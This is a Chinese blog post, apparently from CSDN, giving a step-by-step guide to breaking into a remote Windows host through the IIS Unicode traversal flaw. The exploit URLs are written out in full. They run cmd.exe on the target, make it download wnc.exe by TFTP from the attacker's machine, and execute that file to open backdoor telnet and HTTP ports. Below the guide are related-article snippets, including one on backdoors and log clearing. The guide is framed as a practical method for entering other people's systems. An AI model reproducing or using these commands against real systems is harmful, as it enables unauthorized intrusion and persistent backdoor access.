不用用户名登陆对方系统

最新推荐文章于 2023-05-09 15:05:35 发布
最新推荐文章于 2023-05-09 15:05:35 发布
阅读量1.5k 收藏 1
点赞数
文章标签: iis 浏览器 工具 c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zj060607/article/details/4332453
版权

原理:利用Unicode漏洞登陆对方主机,

试验结果:开放对方707telnet)端口,808http)端口

试验工具:

1.       X-Scan-v3.3(扫描IIS漏洞)

2.       tftpd32.exe(上传wnc.exe

3.       wnc.exe(开放端口)

试验过程:

1.利用X-Scan-v3.3扫描IIS漏洞,结果如图

 

2.利用漏洞,在浏览器中输入:

http://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:/ 可显示目标主机C盘的目录。

 

3.打开tftpd32.exe,建立tftp服务器(本机)。

 

4.

拷贝wnc.exetftp32所在的文件夹,http://172.18.25.109/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+172.18.25.110+get+wnc.exe 即把wnc.exe拷贝到Scripts文件夹下。

 

5.远程执行wnc.exe

http://172.18.25.109/scripts/wnc.exe?/c 即开放707telnet)端口,808http)端口

6.进入对方主机了

 

jier
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
不用用户名登陆对方系统.doc
07-08
自己写的方法,希望对各位有用。 小工具,网上都有,大家搜一下就行了。。
网安--第六章 网络后门与网络隐身
lishirong_李世荣的专栏
12-02 3217
第六章 网络后门与网络隐身 内容提要为了保持对已经入侵的主机长久的控制,需要在主机上建立网络后门,以后可以直接通过后门入侵系统。 当入侵主机以后,通常入侵者的信息就被记录在主机的日志中,比如IP地址、入侵的时间以及做了哪些破坏活动等等 为了入侵的痕迹被发现,需要隐藏或者清除入侵的痕迹 实现隐身有两种方法:设置代理跳板清除系统日志。网络后门 网络后门是保持对目标主机长久控制的关键策略。可以通过
两个系统跳转实现免登录
m0_61289694的博客
05-09 2931
两个系统跳转实现免登录
两个系统跳转实现免登录(单点登录)
热门推荐
书中自有妍如玉的博客
09-07 1万+
2.点击跳转,拿着用户名+token重定向到B站,B站在全局路由守卫beforEach判断to.query.token和to.query.userName是否为空,不为空则代码从别的的系统跳转过来的,调用免密登录(用户名+token)获取用户权限数据信息。B站持久化储存或Vuex储存。1.A站登录后,拿着A站账号名获取B站的token,同时在B站保存改账号的信息(用户名+token+过期时间)定义:多个系统之间在某个系统登陆一次即可访问所有系统。假设A站登录,跳转B站无需登录。3.B站跳转A站同上。
ftp与tftp比较
weixin_34239169的博客
11-01 547
文件传输协议(FTP)实际上就是传输文件的协议,它可以应用在任意两台主机之间,但是FTP不仅仅是一个协议,它同时也是一个程序。作为协议,FTP是被应用程序所使用的;而作为程序,用户需要通过手动方式来使用FTP并完成文件的传送。FTP允许执行对目录和文件的访问,并且可以完成特定类型的目录操作,例如将文件重新定位到不同的目录中。显然,FTP是与Telnet合作一...
用户免登录功能
lffxsx的博客
09-29 8236
思路:用户免登陆的是指用户登录时,输入用户名、密码等等,再勾"记住密码"选项,’成功登录过一次系统,而用户的用户名以及密码等等都保存在cookie中,当用户再次登录时,系统会自动调用Cookie中的数据,自动给用户赋值,从而实现免登陆。下面是实现本次功能的代码: login.jsp: Insert title here String uname="";  
桃源文件系统v3.3
08-04
16、一次登陆:支持通过系统开放接口与第三方OA软件进行整合后,能够成为OA软件的电子文档管理服务后台,用户不必二次登陆即可进入该系统 文件系统v3.3版本新增功能: 1、AD或LDAP域整合:支持企业内部AD或LDAP...
java获取地磅称重数据源码-uip:用户界面
06-15
java获取地磅称重数据源码 ...当确定使用OPC作为数据对接的通讯协议后,对方厂家所能提供的一般就是工程师站的IP地址,登陆用户名和密码。 网络连接 :用一根网线连接工程师站和测试的笔记本,IP地址设置为工
桃源企业文件管理系统源码 v3.2
04-02
16、一次登陆:支持通过系统开放接口与第三方OA软件进行整合后,能够成为OA软件的电子文档管理服务后台,用户不必二次登陆即可进入该系统。 17、AD或LDAP域整合:支持企业内部AD或LDAP环境的帐号直接整合登录,可...
基于JAVA的卫生管理系统含文档
07-05
(1) 登陆模块,可分为管理员登陆和普通用户登录和老板登录三个模块。 (2) 用户注册模块,对用户注册的用户名的要求,不同的用户要求要有不同的用户名。 (3) 系统管理模块,包括添加管理员,管理员密码的修改。...
Windows与嵌入式linux设备数据传送工具——tftpd32软件使用说明
C/C++攻城狮
06-13 3698
0x00 前言 文章中的文字可能存在语法错误以及标点错误,请谅解; 如果在文章中发现代码错误或其它问题请告知,感谢! 0x01 TFTP协议简介 TFTP(Trivial File Transfer Protocol,简单文件传输协议)是TCP/IP协议族中的一个用来在客户端与服务器之间进行简单文件传输的协议,具体使用的是UDP协议,TFTP服务器通信端口为69。该协议适用于在局域网内传送文件,并...
若依(RuoYi)系统实现免登录访问
whq1576049813的博客
03-05 1万+
**1.**找到ruoyi-framework/src/main/java/com/ruoyi/framework/config/ShiroConfig.java文件 在如图位置添加要放开权限的路径 **2.**在控制层注释掉如图注释部分即可 **3.**若前端页面出现部分按钮组件丢失问题,请去掉对应按钮组件里的shiro:hasPermission即可 如图去掉shiro:hasPermission="system:fileinfo:add"即可 ...
java怎么实现子系统免登录_如果旧有系统没有审计追踪或不能实现用户“用户登录”怎么办?...
weixin_42525428的博客
12-10 337
欢迎关注药事云端,了解国内外药事法规和技术趋势译文by Thomas Tang问题陈述:如果旧有系统没有审计追踪或不能实现“用户登录”怎么办?首先,从欧盟GMP指南附录11可以推断出,在计算机化系统中应该有与GMP相关数据及其修改相关的审计追踪。如果在采购系统的时候尚未具备该功能,首先应该核查该系统是否更新了审计的追踪功能。如果情况并非如此,则应该实施合适的替代解决方案。欧盟GMP附录1...
wireshark 抓取telnet登录用户名和密码
ethncitybeta的专栏
04-25 4416
<br />平台CentOS(linux)+ODS(win7)+wireshark<br />1、在linux主机上建立测试用户<br />用户名:ethnicitybeta<br />用户密码:laji123<br />[root@localhost ~]# useradd ethnicitybeta<br />[root@localhost ~]# passwd ethnicitybeta<br />2、在DOS端通过TELNET登录linux主机(此时已经打开wireshark软件)<br />C:/
telnet 远程登录脚本(免用户名和面膜手动输入)
shuzui1985的专栏
12-02 2005
介绍Xp上的脚本,linux的各位看管自己琢磨。 建立一个telnet.vbs脚本文件: set sh=WScript.CreateObject("WScript.Shell")  WScript.Sleep 1000  sh.SendKeys "c:{ENTER}"  WScript.Sleep 1000  sh.SendKeys "cd C:\Documents and S
360路由器v2刷第三方固件_不走弯路:小米路由器3G 刷Padavan固件简单教程
weixin_39601511的博客
10-26 2659
前言-序:文件内容大部分来在网络,网上也有很多类似的教程,而我在刷R3G过程中遇到了很多问题,经过不段的尝试,整理出一篇能少走弯路的刷机教程,希望能帮到你。PS:因为已经刷完机了,图片很少,可参考其它教程的图片。小米路由器3G参数:(简称R3G)处理器:MT7621A MIPS双核880MHzROM:128MB SLC Nand Flash内存:256MB DDR3-12002.4G WiFi:2...
K8s 很难么?带你从头到尾捋一遍,不信你学不会
民工哥的博客
02-23 8717
点击关注公众号,回复“1024”获取2TB学习资源!为什么要学习 Kubernetes?虽然 Docker 已经很强大了,但是在实际使用上还是有诸多不便,比如集群管理、资源调度、文件管理等...
如何查看ubuntu系统ssh远程登陆用户名密码
最新发布
07-27
在Ubuntu系统中,通过SSH远程登录时使用的用户名和密码是系统中已存在的用户的凭据。如果您想查看已存在的用户的用户名和密码,可以按照以下步骤进行操作: 1. 打开终端(Terminal):您可以通过按下Ctrl + Alt + T...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值